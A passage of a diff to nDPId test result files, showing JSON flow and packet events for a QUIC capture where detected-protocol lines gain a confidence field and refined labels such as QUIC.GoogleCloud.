+00704{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431858501,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleCloud","breed":"Acceptable","category":"Cloud"},"quic": {}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431907429,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1621431907429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431907429,"pkt":"AAAAAAAAAAEASYHhCABFAAViVjpAAH4R7N2okEAFiH1DYPJfAbsFTr4Zy\/8AAB0I\/FKj4Rr2N+kAAEU0sUI8yYk\/y\/bPar7IxdtLPlBpfIbJVt\/XG3zjjFAN3PLuPY9aF7M0Mm1Pwz+2ym6LReOn1tdk2pHBdYLYtkb1fXiK42fzBzEBqAcpJ3jEWiim3tGYhBW4xkjPcpkR4V9U0CEIA3BhEltloJi32PcQkjdxPGPSXrYJEyPYT2ODSFP5zFDNrUpqMfmpryMeEByqj9aqyy7TtbIyDDLLeql6c5+G+WJfvTxj\/9W8WJJXv5A2+2wt7cmjNXE5vXIKsxD6kuaexZdsNa+Jr4jhQmDPWt56pOF3oSc\/exjC9ZwNL6Byz+cqgo090k1LpSBEAmIO2JahQD43fCbyWV4juaKj0MNO1pbmnz4OwflX262ok\/jM84d9YgjHmPQxVDwGpKB+k7iS9gP0IunBzPqxZuHmkhsXO2zydYFJgSC\/\/zhZjHtGa3A5oLpp5svgFFyHIWHwV1WsgPl5G+m0zjGIw88EoCFcNVrWAkqaltwzoOYaOv8JtFjKTBrTWSS2yCenFPvS4CiVpH0qOzrWck30mR6VKv+x6O39S8f9xZtECQhmG2mYSgzqYSOTLu8TYzFGeM6fkshiZAH4Rcuh\/rlN\/Jsa5H6fbeTi4JAaGZso4qnhApLrXa2o7crXqkvVvH28YWmlFQx+j96UuaBvpXUP+eVJpGTHlKAySs7PdqSueL59G0N7i7L9plI6+dk46FvYeEp+f7wxaDe9ofiPhkKl77nzCoHlpu9QHGjUG1hD3LrTqagn5YxaAe\/vZz+ZR5XDMGkyjvtQ8CzH750O\/y3RIu\/NzoJHfz70Mwhb5mva6OuXGfu3pnDfzyYgmW2f1EdlTYToarOz0VkmFc90sq7r5B7\/PNAKsIbJnOQjS463M2IqteuzLlV\/keR25no9irWXNenFMchSjXATFHJrxa4+tuks0hrAuCQ9P74T8tIg\/9Rn7z3XecTiiaReESIeFX0atEm6CxOi26ozXUDN+aybaCuI9uH4o3kMLh8H9APymvsHTZQpUtqIhC\/oo5G5CBnxU1wWMKhoH5C8zcwERQJ1+G9XqwN3WjaalURD+EDpCo6uvKka1xUNuYrbD3WxT0n1ODENp0Qq8Ouczn6Bc74W3bNVp3L\/70lPtnGF\/vDIQ0AgcqodmWxltWd4x+oE5e9lDvVivstNGUsf3WVMBPLQOTWeJow9hxLTXFulkHKm\/9m8ONJVe8mRVVH3uwATt6K7cW+M5UHJlGbqkrrKvaq6stg6DWgtUtqTZGBCuGviWVywpkMFl8JYsKFOo2C8dYdoed+lyR29yIQyzC+5PshUVMz+15EUTfehVIrQdinMs8GC1ufyZUllTZ3PDmgBejR3TZTfNXPjDfwNc+TazIP8DqvBBPRJBB2kbLub9\/kgyw1MlzRzbAVqKbkfo6Xh7m\/la1ItF1D8yrjJBFh9Tmgu4+xXJRv7DW6+G1WkmPAAG9w\/i5FmPFMvZQ76UHxJWyfTyoxkIVglJSTw2j5Mv6nedASTTIn+oaAKlR0MpsDHaGI6cAT0G5S4F+89LSYi0DoIHcWC2W70SgDJsNbgysQVHdV4uTwXh\/LOoPR1c\/24Ev\/nFE4oTBtSXRHj\/g9aJYtNJ4Bphqchj\/ydCiV1FKZ4F0VFKXdo786gAHfX2mBeOeLn0Lhn3tTg\/G9s+9dQN5nOBgv0p5HQgLKG6NUNXB4bml7Gr4C7jyXtpqMA10w34E9oSHrOYzPVMRKouJzSoQiDSBJKXtDko+KZvedTXBDCzTxXxdQMGdU5EABWjdJgadLe3U6LR1WE"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431907429,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00697{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431907429,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -136,21 +136,21 @@
 00623{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1621432429509,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621432429509,"pkt":"AAAAAAAAAAEAS1QMCABFAAViiC5AAH4RLC2okEAF3FB+Sf3QAbsFThnNxv8AAB0I+DF9BCeanTIAAEU00hb7OpWAmpFx8qx0bByvtqmnAysWW16ZDvTiBt7+493PQtqd2pKjXT8n6LbaHZrBOy7lzR4IRozP76TQ9DxkFAYnbYCqRHqgPXL5pU+zxh+eB1qzeaw4PD9sxeGceY7QPFO2WPj99N6anJpqI5Hcerw4FTNYR8r1d+SWlStf7eJXbom+ocP1XACdlYH06H03DxDNPtLz\/XsvkXaRPpqyh9hAe4diK1f3iIM2QaXjqckDT+tjaYEhYR+BbL7vNxBY8wfGtlxPQZ7GgVmzdWF+sXyPQuPaTJPnp6PHwhYcy3PsXRrOmC13SC3mZvcQ4+IGjqfqhG+D9wugf7LmbKqsznjJfXzBwYIpCNL+MHcorYpGmUUn6+dyppyRtIzd5m8irD6UYlkt+9VgpoYwGSX69u5si0i0viLsrK8i\/m6Mf0iQ\/Spi96VDtOTfFfSGprx6ij\/O7kc7TXG8oZ0bctqwNFJYOvlWB4CxfK1rYG0mD7xeo2AAgOTRDH8+AYCxUdEzUhiS9ozc2lRPoJkzP2AUr79N7oMid\/+ZbqVhmrpW7XdI12cPRgMmLNFI2MCGTdtlIH5yj6rZtmN67GfACUVK3eHHT3gwe9Jqb0QlZnM70xYApitcdFflHseTh619fCFNKL2L1AUL6shWE6hYP4JwBlMizT032t\/G3ASg\/GZ6BQlaObPebtYEVaZCai90TwmlfCeA\/AIXdD8iJXn7qA5z4o9cudnvk3agR7adxxofVPe6U4OcOJSG1IX2\/mU9S3WYmdFWlpmlMVHWT3QNthK23pRqiZHtH51vPjMDpY3FqBdaqTN8m\/Dc4voSrhGa0IJlpuTviRXm7EgxB8GHN9HytCvDZuPXhu91noUZcgCIcGTZdSBm7cO\/YoHlfVoH\/mVp5MrHSi9cVczjkioTHtPkpy1ub78xuF91\/7S4rXYep6NGOoGjl23AjOJfTTGhu5OWPnU9zMLFkllrVtCulEqT+b5PFzw2wjUYTJTfyrFiv4F8XdsoNLNTmtUCFVtsmWcabX5L6p42ndagG\/+lMde5hAmST6j3vklTteqoWcqrEZNH4LzFgOyupl0Nl63YsGt1OzfxU+904VhWQPq2NIdlO+VtI2U06A2jgU4WwWPcULGssz3QtHxG+LwUiedg0QSFGFQKA+HA3HUYnUTTYIQEOfSJx3BxpSEIE+zqBA8OZ8JL2GHKmdK1yQ+QhbvZXA4BPgaafeG++Hlfj9oqrT+ZkIG2l0Yfi89xALYyMS\/gQtfGRo\/IadU5q3tpHQLFWpdkHZ9FwndqSUrS1W8KKMO\/Y8VATyOpS4PEVwTvTNX4MptJ5NujWqz1tWdiz33An49EYTOXVJvPTodQHJ6ScBKXD30TZbFd4JFzqTcxJu3nOEA6eQblNYy03SZE\/gq\/uktoCqfQIdHNw9SpoHHvaxzhTg4ZR09H6m1QeCHM3dx7ZS5pYsDTexlRcFXpzoNicNl8Q\/2OtYWMZ4zF6\/CjcDuQvPr2BUhrvbmwgeP6jRdw+XwQt+56ZJnLJ7rqhWgtjWk0w4rXPG9gc7C9mf1jPCpHdhiaiIHYCW1Wd3j1GtKfhCdyiCFOIWtzH0tcNMR8zIv9wbPxww9aLwCYz5XkiX9tknrGgSCPyQiiND9wb6jafpQD1hvkRwJxkCJOZU8vAuWEsMD6iwR4yDvCNedmLBMJI9iw\/9hqHHhyJIDnBp6H8oKWPSKifJafbNfTF1Fz7AvqO\/tFzsGlI2GW4QCJCL+P0gz9lGiqCDzlVP7LUu3jgRkwKna8"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432440134,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1621432440134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621432440134,"pkt":"AAAAAAAAAAEA737VCABFAAViBAZAAH4RSf6okEAFI8KdL+8ZAbsFTr\/Xzf8AAB0IcdVU301Wze0AAEU0qL3NNLtf2+b\/2Q4JDmzOHuurx9ulrjBLe9GvWGRZXR74WuLmvtIcsJsXXu\/onEdRmT3qTKLOfB7QlcM+PdfoCZmAYmwmyLMzO1HiyG7sIAFes4PP7T6NAXfX4dDWOMvuIoqSmNkVfgauiC5HOyWMHbTwhfwIk9FH1THd9hg6M7nbFuqZXTlC9q\/HwWaVt0bqSTrO3Bj08fiQQfXQGebdpALH6GbV3Jk1dtdbibh6Q37TxrzVgVH5kTFgrwemEnm6q0JQ4Dhq3cX19c8TR3nc50xv+02sA747DQ\/Og4Dz3zoy3+9lfKFqG4wBWdi7z9Rtbn6YwB0LntW5ts12RB+1xYF3UXtpz2seNJelWMZlW1Yh2Fg7mxZYCV0mhQ+xkW1jz6uQcCXMvY5VUbBhvI7zPyZXMY225B2xtuayBXFLLNWzpbQeAEm4XEG4jck8JjKcdxDGQ+tGA6NImdCpMo5KmFlcOnxo4uqBnZ9OZkKuYmAiB3GuA2sRbfaBNzP8vQwIFvmHb\/Rj2f71WSeQKgdmQsaAhoH\/i\/3l5iENNXW6JY9oLoSzWpFhhMlhMjBZ3S1j79TiuS1cWWOOgbGTSXawjyS+IJUIEba2UWRmGIBGjXz7YQQM8xrQS3DbYPJpoisNf04U9mZ54mIM7d+qCQg6VvUNSPRVsV2ux9+PC4W+DFbNy7ALH9ybKA9vKWlQUpcbaW+jQsoJM\/SQ5b4QpyLutRi\/+03sArWhuCnGvdy7QAw+lqj4m6TazHFMsw8w9T2dXVSYXvMNZZ+lLEZlQPpZjmx9uVHste\/wK0vx2c2TjY1hHMzZ4AGwz0ms2kd6XzNS\/wvUOYDcKfIokyYtfAUWmCQI168\/+BuG8b18LWykPNLhWdChPdxlY1M+5SYzdwPjjveFCHw1L31UvQ6QTs8T38YN3DeGrsHTEy1s0ONT1u8feiEDnAPamO5WxHIjVwTMaqbM76RuQbnmjfhNHd0QoBM2fFReITNAsjH5kJa7i1TauIG0LaQZDpRVw3ICDfio58fJIl35v5PBMp8xp6YEUh6d3p9ScDuUo02IpwHd1HAlLwRGLR3NEtr5XuCivraDkSulNk3LUOQdi4J3hNX6NixF3PLCKpvKYYBlI5Sbhl1LhL8Zjl9RJmBTxo3afoYRddxBMufMU3TDfOy2JAEIIvU6KLGYmcpbsBtJwsXg0+562385q64u2sTt2RWiXKEd9XAbOSkl8zz\/mhucCFcCxP\/aDXgf0nhuQpFELBEZxhmx10a3fl8WGlup7xBSgxvAoyjKgZwDinUQRGlQ4Y2+tHaNOUbjWKe1wgznCkTVbj4wkKMm7RKCqDexOds6oHYJPSEl2ioqJqXv85s9\/qmLyp\/s1AI8M7Mm8FUs7EDf5f1L5asrjpQuWtQiUN0J6w4SwozYuqkLkch\/ICUylDPff4K1jxbiN1VWrycEsZdK5WpULn5nsb9oIRivBTIrKfF2Vfspz\/ToLSA8OMT+vsu\/+HK6nVkqTjzbRqT+pMnx2Bg8V55cqGRM016Z6gjflmJ1aHj+\/7PWGoGPR1OQLMY\/Bbvy6c2Rry2q\/F6g8U6A11H66ntA51Q1W18sSC19Oo78tRgloQAn3NhfHhRfesZlY7E7I6PWaLKJ9bgiKoE4IEvCn6psctBWJXQo2AFp11lONrIQS2Q5YaGNNVXxi5Dw01RN1HiS0lRdioVe9QcDCTMQZDSAB5lZNujG+Ir7VUx07m5euHIfgcaR55adpIzCIXUpqTuVCHNV24cdDCtFs\/WXmPsU"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432440134,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00704{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432440134,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleCloud","breed":"Acceptable","category":"Cloud"},"quic": {}}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432489421,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1621432489421,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621432489421,"pkt":"AAAAAAAAAAEASF70CABFAAVi8YJAAH4RfUeokEAFYy08\/sVsAbsFTr7Cyf8AAB0IKamQAwU5OroANwARJweyyh8ASQgxaSFNO9MfXImTMnwyXomKh\/ZNPfedDyh5KvfO1MGG51HqkCogC6AtPwJhXTpE\/UKpou6VqZCesbSiBTNDA1JFBQs9B6lpbtkYSC+McmmSMojjEgtxhDYt8\/9dtYYlDOPFZ\/dpG+QdFbgpLb4LL6Kabs8KYDLn+VqI2E8m8ueQOkn1lBiQoAvc0rNjKOazmVq5mZXSMd1VKlKpsbLOchPYIZxqylhHTDiE7M3pNLaBVo\/olK9W8Zr8w5fFNyksOM0htXk+QusGKuzXzx2XRWu+\/Nk8r7wn26b5E2vnI6CqmRqlOx9Hbk9Oav798TUdoZ0ik2Pol9Xb+eCHQNw+XlJCy\/TQAtSNksS7kjeCCjcbIt41ZBla1c58qm1+q0++oj5c2fe6RrhPybaYLt8YUpSsMhpGJI\/Ql2\/NmxHBJxo5URbPjWXLfEGzOcpmsNmVJ2O9aDrYcnv7WnX5CqvzA823haQIF1GHG7\/MkUogQZRdTEAvJm6fBF5zdqrS2BtCxd2wUWnXyoJY3aKCgXRQrdDpBCgpGApMxKuJB5qoWXrZh8eHqiyYIyjBNfvtQacRj6kQMCYITp5tTIecrcXoKPocWiez2LDcj\/S\/19jMLvrNbAcBhQ6KfoiiIJJOb3DnfTdQP6\/4DMSpIjO+s3jvnlF0btkDi2\/ISfy4kfHVix828TssUSRGKO7KC0GwgS6FJsjlz0BU+vv1QZznASY0gmrqU3L3V5EQeJ0JuFK8HKRd4Fj+EOeYQx60REWybndyHIisn1HhzWoZcpBZwH8Nx3rK3uqBbQKlKJmY1TKEse7UpeUToZQDC4fP0SVbtXlKRmkq+uL6gS0GXdLk+VwSXcDDT+JTBTAhOp\/PT0efB56Sw+xnoUoFO+26Osuir43c64mxBrmnuAVQrEG026YUbEpAkKETMHo85xB4Z7xRvocdlOwY06zlP9\/rFbbBE+M+FpELJaF1wOHE282\/6ko8\/0bJJFV2afTCYTIRatNwPLUVY54dJGaDmplh02DhsFSye4H1RytUERPkjLbau4RtBnyf8NekTGeSkfPd29dQ+7m1VARylC5UF8rsK9PxqZ1IjkctsYgU+YvVSm5sX2FqZmQnWn7sx+TmogpnRijHnt3gAx8MpZ1\/6vPZ0mXemrF1srit9ZhT9S1OtARcQG2mrpiCj3+wcDBjy8OxZdjDuPm+7HYnGMUpqQkUp5WDI0HR2Th8J5PiquceXUIN4UYAUOeV6+xy586aR9Bisr9aBs9XUgGeWalZKu0RJLjU\/r6J6yoYwl+tg\/Zh3vVSM24611GhQaadM3op866bGdU4YLBybgRc3Gl0QGq2gCLhejcidoxs5tD3NjeK89xtwPQd7irCBamj04rGwldvYQzxbOjeA5oAoJSaadBElduSTxGYH3oVrfOgrS2xGZtBSStJG7d09ikIYBkxSUYLU27iwQJherSUvhZ85af0XhrTHEYu6GB2FjNOq+mksDa8mM8rpcJgx+hehI17xz+xkqLWilCXGjnoMZWTF4Tx8xav902wfX8qjTHhu5vIsQ\/UV+gR7AYOV0tnC8Ul0PnHl3PUWikjISrIX+vX8LECvnHa+4b7xSouGskcMlecPWND4hCVtRZvNm9FxXgWi2wjpcIcPfODR+Arhmv3RE8GE8lOzxw8rv2AGdqFNX5JwaFFXigZ3vX4WrSH2bNvsDcj\/5We1g3jrVPhkwMz5PcaJQDojUW2GfWTFK1W+lQcDVZR4jO2eOnoR1WqEqE7OlWlEJxz"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432489421,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432489421,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432545371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432545371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
